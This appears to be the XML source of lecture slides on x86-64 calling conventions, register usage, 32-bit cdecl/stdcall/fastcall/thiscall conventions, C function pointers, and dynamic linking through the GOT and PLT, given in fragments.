              <a:t>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  <a:t>r9</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800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Function arguments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="496888" lvl="1" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="660033"/>
              </a:buClr>
              <a:buSzPct val="75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dirty="0" smtClean="0">
                <a:latin typeface="Courier New Bold" charset="0"/>
                <a:cs typeface="Courier New Bold" charset="0"/>
                <a:sym typeface="Courier New Bold" charset="0"/>
              </a:rPr>
              <a:t>%r10, %r11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451600" y="1959858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451600" y="33314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451600" y="37886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994400" y="2417058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649513" y="1959858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451600" y="42458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451600" y="47030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451600" y="5160258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451600" y="5617458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451600" y="24170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451600" y="2874258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814071" y="3560058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613772" y="5388858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994400" y="5160258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508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x86-64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  <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 4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4586287" cy="521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lnSpc>
                <a:spcPct val="95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107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2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defRPr sz="24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defRPr sz="20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66"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="16" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle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kern="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0" smtClean="0"/>
              <a:t> must save &amp; restore</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="496888" lvl="1" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="660033"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Times New Roman" pitchFamily="16" charset="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kern="0" dirty="0" smtClean="0">
                <a:latin typeface="Courier New Bold" charset="0"/>
                <a:cs typeface="Courier New Bold" charset="0"/>
                <a:sym typeface="Courier New Bold" charset="0"/>
              </a:rPr>
              <a:t>%rbx,%r12,%r13,%r14</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="508000" lvl="1" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="005400"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Times New Roman" pitchFamily="16" charset="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kern="0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kern="0" dirty="0" err="1" smtClean="0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kern="0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kern="0" dirty="0" smtClean="0"/>
              <a:t>May be used as frame pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="508000" lvl="1" indent="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400" kern="0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kern="0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kern="0" dirty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kern="0" dirty="0" smtClean="0"/>
              <a:t>Special form of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" kern="0" dirty="0" err="1" smtClean="0"/>
              <a:t>callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" kern="0" dirty="0" smtClean="0"/>
              <a:t> save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kern="0" dirty="0" smtClean="0"/>
              <a:t>Restored to original value upon return from function</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" kern="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="552450" lvl="1"/>
            <a:endParaRPr lang="en-US" kern="0" dirty="0"/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527800" y="1219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527800" y="35052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6070600" y="12192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42000" y="30480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99000" y="18288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60950" y="32766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527800" y="3048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527800" y="1676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527800" y="2133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527800" y="2590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3400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762000" y="14478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%rax</a:t>
            </a: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762000" y="20574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%rbx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762000" y="26670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%rcx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762000" y="32766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%rdx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762000" y="38862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%rsi</a:t>
            </a:r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762000" y="44958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%rdi</a:t>
            </a:r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762000" y="5105400"/>
            <a:ext cx="3505200" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EFBFB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%rsp</a:t>
            </a:r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762000" y="57150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%rbp</a:t>
            </a:r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4724400" y="14478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%r8</a:t>
            </a:r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4724400" y="2057400"/>
            <a:ext cx="3505200" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F6F5BD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%r9</a:t>
            </a:r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4724400" y="26670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%r10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47118" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4724400" y="3276600"/>
            <a:ext cx="3505200" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EFBFBF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%r11</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47119" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4724400" y="38862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%r12</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47120" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4724400" y="44958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%r13</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47121" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4724400" y="51054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%r14</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47122" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4724400" y="5715000"/>
            <a:ext cx="3505200" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CDF1C5"/>
          </a:solidFill>
          <a:ln w="25560" cap="sq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0066"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>%r15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2678113" y="5802313"/>
            <a:ext cx="18049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6640513" y="5791200"/>
            <a:ext cx="18049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6632575" y="5181600"/>
            <a:ext cx="1804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6632575" y="4572000"/>
            <a:ext cx="1804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6351588" y="3962400"/>
            <a:ext cx="21431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C: Callee saved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6632575" y="2743200"/>
            <a:ext cx="1804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2670175" y="2133600"/>
            <a:ext cx="1804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Callee saved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2587625" y="5181600"/>
            <a:ext cx="1914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Stack pointer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6278563" y="3352800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Used for linking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2646363" y="1524000"/>
            <a:ext cx="18399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Return value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2608263" y="27543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#4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2608263" y="4572000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#1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2608263" y="33639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#3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2608263" y="3973513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#2</a:t>
            </a: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6570663" y="2133600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#6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6570663" y="1524000"/>
            <a:ext cx="18923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alibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Argument #5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Text Box 9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</a:rPr>
              <a:t>x86-64 Integer Registers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167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 smtClean="0"/>
              <a:t>Callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean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$16,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5788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4419600"/>
            <a:ext cx="8763000" cy="762000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%zmm0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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419600" y="4561114"/>
            <a:ext cx="4495800" cy="544286"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="29000"/>
            </a:schemeClr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%ymm0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010400" y="4648200"/>
            <a:ext cx="1905000" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D9D9D9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%xmm0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1148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511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41148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255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86800" y="411480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4114800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127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Floating point arguments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147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Recall integer arguments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64-bit registers used to pass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 marL="1146175" lvl="2" indent="-223838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%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rdi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, %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rsi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, %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rdx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, %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rcx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, %r8, %</a:t>
            </a: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r9</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000099"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="385763" indent="-371475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Floating point</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="730250" lvl="1" indent="-23812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Special vectored registers to pass (AVX-512)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000099"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1146175" lvl="2" indent="-223838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b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000099"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>%zmm0 - %zmm31</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000099"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1144588" lvl="2" indent="-223838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Capacity for a vector of 8 doubles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1144588" lvl="2" indent="-223838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Also used for vectored integer operations (more later) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1144588" lvl="2" indent="-223838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600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000099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410200" y="1481138"/>
            <a:ext cx="3581400" cy="20621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286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When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swap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executes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ret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 it will return from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swap_ele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marL="342900" indent="-3286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/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Possible since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swap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is a </a:t>
            </a:r>
            <a:b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“tail call”</a:t>
            </a:r>
            <a:b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(no instructions afterwards)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533400" y="1557338"/>
            <a:ext cx="4648200" cy="2009775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F6F5BD"/>
          </a:solidFill>
          <a:ln w="12600" cap="sq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long scount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/* Swap a[i] &amp; a[i+1]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void swap_ele(long a[], int i)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  swap(&amp;a[i], &amp;a[i+1]);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457200" y="4191000"/>
            <a:ext cx="8686800" cy="16283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swap_ele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movslq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esi,%rsi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        #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Integer promotion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leaq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(%rdi,%rsi,8), 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# &amp;a[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leaq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8(%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    # &amp;a[i+1]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</a:rPr>
              <a:t>   swap                 # swap()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latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Optimizations: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</a:rPr>
              <a:t>Explain the jump</a:t>
            </a:r>
            <a:endParaRPr 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32-bit calling conventions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Linux IA32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>cdecl</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/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 pushes arguments on stack before call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 clears arguments off stack after call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Win32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>stdcall</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/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 pushes arguments on stack before call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/>
              <a:t>Callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> clears arguments off stack before returning from call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Saves some instructions since </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> is already restoring the stack at the end of the function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err="1" smtClean="0"/>
              <a:t>fastcall</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/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Save memory operations by passing arguments in registers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Microsoft implementation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400" dirty="0" smtClean="0"/>
              <a:t>First two arguments passed in registers %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> and %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/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400" dirty="0" smtClean="0"/>
              <a:t>Code written on Windows must deal with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>stdcall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>fastcall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> conventions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Linux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400" dirty="0" smtClean="0"/>
              <a:t>Must declare in function prototype which calling convention is being used  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400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://gcc.gnu.org/onlinedocs/gcc/Function-Attributes.html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Stack Popping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Popping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popq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/>
              <a:t>Dest</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1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Read operand at address given by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Write to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Dest</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" i="1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Increment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r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> by 8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i="1" dirty="0" smtClean="0"/>
              <a:t>e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>popq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endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-234950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movq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (%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addq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> $8,%rsp</a:t>
            </a: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621337" y="5311773"/>
            <a:ext cx="501650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598987" y="4573586"/>
            <a:ext cx="977900" cy="920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Pointer</a:t>
            </a:r>
          </a:p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6132512" y="1981200"/>
            <a:ext cx="1292225" cy="32004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7504112" y="4114800"/>
            <a:ext cx="1588" cy="13716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7580312" y="4495800"/>
            <a:ext cx="1563688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Stack Grows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Down</a:t>
            </a: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V="1">
            <a:off x="7504112" y="1981200"/>
            <a:ext cx="0" cy="129222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580312" y="2286000"/>
            <a:ext cx="1346200" cy="636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Increasing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Addresses</a:t>
            </a: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H="1" flipV="1">
            <a:off x="6954837" y="5497513"/>
            <a:ext cx="647700" cy="3937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6842125" y="5961063"/>
            <a:ext cx="150177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“Top”</a:t>
            </a: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818312" y="838200"/>
            <a:ext cx="18827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360" tIns="44280" rIns="90360" bIns="4428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Stack “Bottom”</a:t>
            </a:r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H="1">
            <a:off x="7192962" y="1295400"/>
            <a:ext cx="469900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6132512" y="5181600"/>
            <a:ext cx="1292225" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00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FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49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FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRP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5735171" y="5021263"/>
            <a:ext cx="326372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Arial" charset="0"/>
              </a:rPr>
              <a:t>+8</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16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>
            <a:off x="5751512" y="5029200"/>
            <a:ext cx="1588" cy="3048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 type="triangle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5638800" y="5029200"/>
            <a:ext cx="501650" cy="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 flipH="1" flipV="1">
            <a:off x="6934200" y="5181600"/>
            <a:ext cx="685800" cy="685800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5" grpId="0" animBg="1"/>
      <p:bldP spid="36" grpId="0"/>
      <p:bldP spid="37" grpId="0" animBg="1"/>
      <p:bldP spid="38" grpId="0" animBg="1"/>
      <p:bldP spid="3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32-bit calling conventions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err="1" smtClean="0"/>
              <a:t>thiscall</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/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Used for C++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Linux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Same as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>cdecl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>, but first argument assumed to be “this” pointer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Windows/Visual C++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“this” pointer passed in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/>
              <a:t>Callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> cleans the stack when arguments are not variable length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Caller cleans the stack when arguments are variable length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066800" y="1527175"/>
            <a:ext cx="6858000" cy="1511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Function pointers</a:t>
            </a:r>
            <a:b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Pointers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Central to C (but not other languages)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So far, pointers in C provide access to data (via address)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Every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pointer has a type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Every pointer has a value (an address)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Pointers created via the “&amp;” operator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Dereferenced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with the “*” operator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But, pointers can also point to code (functions)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Function pointers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Store and pass references to code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Have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 type associated with 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them (the type the function returns)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Some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uses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Dynamic “late-binding” of functions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Replace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large switch statements for implementing dynamic event handlers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Dynamically set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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behavior of GUI </a:t>
            </a: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buttons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latin typeface="Arial" charset="0"/>
                <a:ea typeface="AR PL ShanHeiSun Uni" charset="0"/>
                <a:cs typeface="AR PL ShanHeiSun Uni" charset="0"/>
              </a:rPr>
              <a:t>Dynamically set a random number generator</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16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Emulating “virtual functions” and polymorphism </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="AR PL ShanHeiSun Uni" charset="0"/>
                <a:cs typeface="AR PL ShanHeiSun Uni" charset="0"/>
              </a:rPr>
              <a:t>in object-oriented programming languages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smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="AR PL ShanHeiSun Uni" charset="0"/>
                <a:cs typeface="AR PL ShanHeiSun Uni" charset="0"/>
              </a:rPr>
              <a:t>Implementing callbacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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qsort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() with user-supplied callback function for comparison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man </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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qsort</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16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Function pointers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declaration in C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)(char *);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is a pointer to a function taking a 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*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argument, returning an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How is this different from </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" indent="-209550" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="4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(char *)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  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Using a pointer to a function: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foo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(char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*){ };    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//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foo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: function returning an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endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00206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(*bar)(char *); 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//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bar: pointer to a fn returning an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endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00206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bar =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foo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		   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//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Now the pointer is initialized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x = bar(p);	      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//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Call the function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9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print_even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){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("Even %d\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n“,i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);}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print_odd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 {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("Odd %d\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n”,i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 }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main(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argc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, char **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argv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 {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void (*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argc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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b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argc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% 2)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fp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print_odd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else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fp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print_even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mashimaro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% ./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funcp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a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Even 2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mashimaro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% ./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funcp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a b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Odd 3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="385763" indent="-366713"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mashimaro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%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066800" y="4616450"/>
            <a:ext cx="1588" cy="381000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0" y="3429000"/>
            <a:ext cx="4572000" cy="323383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main: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40059b: sub    $0x8,%rsp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40059f: test   $0x1,%dil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4005a3: je     4005ac &lt;main+0x11&gt;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4005a5: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mov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$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print_even,%eax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4005aa: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jmp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4005b1 &lt;main+0x16&gt;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4005ac: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mov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$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print_odd,%eax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4005b1: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callq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*%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rax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4005b3: add    $0x8,%rsp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4005b7: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retq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Function pointers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Dynamic linking via function pointers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Code for functions in dynamic, shared libraries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Loaded at run-time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Addresses unknown until program execution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Relocation information in binary so loader can “fully link” in memory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In theory, done all before program begins execution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In practice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Late binding and linking via function pointer table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Why link a function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>a program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>does not call?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Why link all functions at the beginning?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Link upon first invocation of the function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>by program</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean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Two data structures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Global Offset Table (GOT)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Array for storing addresses of library functions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smtClean="0"/>
              <a:t>Uninitialized at start of program</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600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dirty="0" smtClean="0"/>
              <a:t>Each entry instead points to code that invokes linker (to resolve address upon first invocation of function)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Linker then replaces itself with actual function address for subsequent invocations of the function</a:t>
            </a:r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Procedure link table (PLT)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Code in .text section that invokes both the linker and the library function being called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685800" y="228600"/>
            <a:ext cx="3261946" cy="1846385"/>
            <a:chOff x="685800" y="228600"/>
            <a:chExt cx="3261946" cy="1846385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685800" y="228600"/>
              <a:ext cx="3261946" cy="18463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algn="ctr"/>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New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88435" y="788333"/>
              <a:ext cx="3097765" cy="12251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GOT[0]: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" i="1" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t>addr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" i="1" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t> of .dynamic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GOT[1]: </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US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addr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 of </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US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reloc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 entries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GOT[2]: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" i="1" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t>addr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" i="1" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t> of dynamic linker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GOT[3]: </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="1200" b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0x4005b6  </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="11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# sys startup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GOT[4]: 0x4005c6  </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="110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# </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="1100" i="1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printf</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="110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()=&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="1100" i="1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plt</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="11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GOT[5]: 0x4005d6  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" i="1" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t># exit()=&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" i="1" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t>plt</a:t>
              </a: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endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Text Box 119"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="719276" y="536331"/>
              <a:ext cx="218034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dirty="0" smtClean="0">
                  <a:latin typeface="Helvetica" charset="0"/>
                </a:rPr>
                <a:t>Global offset table (GOT)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31" name="Text Box 119"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="685800" y="228600"/>
              <a:ext cx="129875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i="1" dirty="0" smtClean="0">
                  <a:latin typeface="Helvetica" charset="0"/>
                </a:rPr>
                <a:t>Data segment</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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85799" y="2198077"/>
            <a:ext cx="3464170" cy="283112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sk-SK" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="sk-SK" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sk-SK" sz="1400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>callq 0x4005c0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" sz="1200" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" sz="1200" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>() </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Box 119"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="2198077"/>
            <a:ext cx="13484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 i="1" dirty="0" smtClean="0">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:t>Code segment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" i="1" dirty="0">
              <a:latin typeface="Helvetica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54958" y="3244362"/>
            <a:ext cx="3069696" cy="172329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200" i="1" dirty="0" smtClean="0">
